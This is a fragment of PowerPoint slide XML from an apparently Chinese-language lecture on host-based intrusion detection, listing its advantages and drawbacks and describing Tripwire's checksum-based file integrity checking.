            <p:cNvPr id="53" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="311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文件系统</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="54" name="组合 53"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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56"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14" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1363461" y="3665678"/>
            <a:ext cx="2757805" cy="957580"/>
            <a:chOff x="1860" y="1798"/>
            <a:chExt cx="4343" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3092" y="1965"/>
              <a:ext cx="3111"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eaLnBrk="0" latinLnBrk="1" hangingPunct="0">
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" sz="2800" b="1" dirty="0">
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>进程记录</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="组合 17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1860" y="1798"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="3713" y="3122"/>
              <a:chExt cx="1508" cy="1508"/>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3" y="3122"/>
                <a:ext cx="1508" cy="1508"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4237" y="3472"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="121858" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5044440" y="1590675"/>
            <a:ext cx="3220085" cy="2297430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="图片 21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6448425" y="2484755"/>
            <a:ext cx="2192020" cy="2476500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7328535" y="2973705"/>
            <a:ext cx="3491865" cy="3151505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F639AB5-F82D-4575-843F-30091DCC7810}"/>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234359119"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="985560"/>
          <a:ext cx="9144000" cy="5786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1080000" y="1260000"/>
            <a:ext cx="2607310" cy="720000"/>
            <a:chOff x="3792538" y="3152454"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39"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003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>关键技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F86773-0B31-49A3-AB38-99F94C4500BC}"/>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1550110" y="1300637"/>
            <a:ext cx="1600331" cy="942555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="112500"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1550035" y="2323465"/>
            <a:ext cx="4132580" cy="3825240"/>
            <a:chOff x="1906" y="3714"/>
            <a:chExt cx="6508" cy="6024"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="51" name="组合 50"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4295" y="3976"/>
              <a:ext cx="1761" cy="897"/>
              <a:chOff x="3792538" y="3152454"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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53"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55" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3860799" y="3293024"/>
                <a:ext cx="1109128" cy="59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优点</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="矩形: 剪去左右顶角 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1906" y="3714"/>
              <a:ext cx="6508" cy="6025"/>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8" name="组合 17"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1906" y="5108"/>
              <a:ext cx="3661" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3661" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="271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检测准确度高</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="20" name="组合 19"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>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3" name="组合 22"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="5794"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="24"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可以检测没有明显特征的入侵</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="25" name="组合 24"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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8" name="组合 27"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="6413"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="2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针对性的检测</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="30" name="组合 29"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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3" name="组合 32"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="7084"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34"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成本低</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="组合 34"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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38" name="组合 37"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="7747"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3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对网络性能影响小</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="40" name="组合 39"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="43" name="组合 42"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1908" y="8430"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44"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适用加密、交换环境</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="45" name="组合 44"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>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6</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="125" name="组合 124"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6605905" y="2323465"/>
            <a:ext cx="4132580" cy="3825240"/>
            <a:chOff x="10403" y="3659"/>
            <a:chExt cx="6508" cy="6024"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="57" name="组合 56"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12792" y="3920"/>
              <a:ext cx="1761" cy="897"/>
              <a:chOff x="3792538" y="3152454"/>
              <a:chExt cx="1239837" cy="734063"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="60" name="AutoShape 15"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3792538" y="3152454"/>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6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63" name="Text Box 24"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3860799" y="3293024"/>
                <a:ext cx="1109128" cy="59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3399"/>
                    </a:solidFill>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>缺点</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形: 剪去左右顶角 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10403" y="3659"/>
              <a:ext cx="6508" cy="6025"/>
            </a:xfrm>
            <a:prstGeom prst="snip2Same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67" name="组合 66"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10403" y="5052"/>
              <a:ext cx="3661" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="3661" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="70" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="271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实时性较差</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="75" name="组合 74"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="76" name="图片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8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86" name="组合 85"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="5774"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="91"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无法检测数据包的全部内容</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="95" name="组合 94"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="96" name="图片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9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98" name="组合 97"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="6411"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="99"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占用主机资源</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="100" name="组合 99"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="101" name="图片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0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103" name="组合 102"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="7100"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="105"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隐蔽性较差</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="106" name="组合 105"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="107" name="图片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0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110" name="组合 109"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10405" y="7781"/>
              <a:ext cx="6016" cy="1308"/>
              <a:chOff x="1104" y="8034"/>
              <a:chExt cx="6016" cy="1308"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="115" name="Rectangle 2"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2049" y="8378"/>
                <a:ext cx="507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rPr>
                  <a:t>无法检测某些网络攻击</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="116" name="组合 115"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1104" y="8034"/>
                <a:ext cx="1381" cy="1308"/>
                <a:chOff x="8632" y="3854"/>
                <a:chExt cx="1508" cy="1508"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="117" name="图片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11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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AAB1F87-47BE-452C-8BBC-88C8F5466C93}"/>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80000" y="1260000"/>
            <a:ext cx="3835400" cy="720000"/>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HIDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>实例</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>——TripWire</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1436370" y="2190750"/>
            <a:ext cx="5228590"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800" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于主机文件的入侵检测系统</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52" name="组合 51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1438648" y="2789355"/>
            <a:ext cx="7471410" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="11766" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1082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为主机系统的一些关键文件建立校验和，维护文件正常变化</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="55" name="组合 54"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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4" name="组合 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1432298" y="3350060"/>
            <a:ext cx="9340850" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="14710" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1376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通过校验和检测文件及其属性的异常修改，从而发现入侵行为</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="21" name="组合 20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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5" name="组合 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1436108" y="3865680"/>
            <a:ext cx="6848475" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10785" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="984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能够在一定程度上恢复修改前的系统文件</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="27" name="组合 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>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2" name="组合 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1433568" y="4392095"/>
            <a:ext cx="3906520" cy="830580"/>
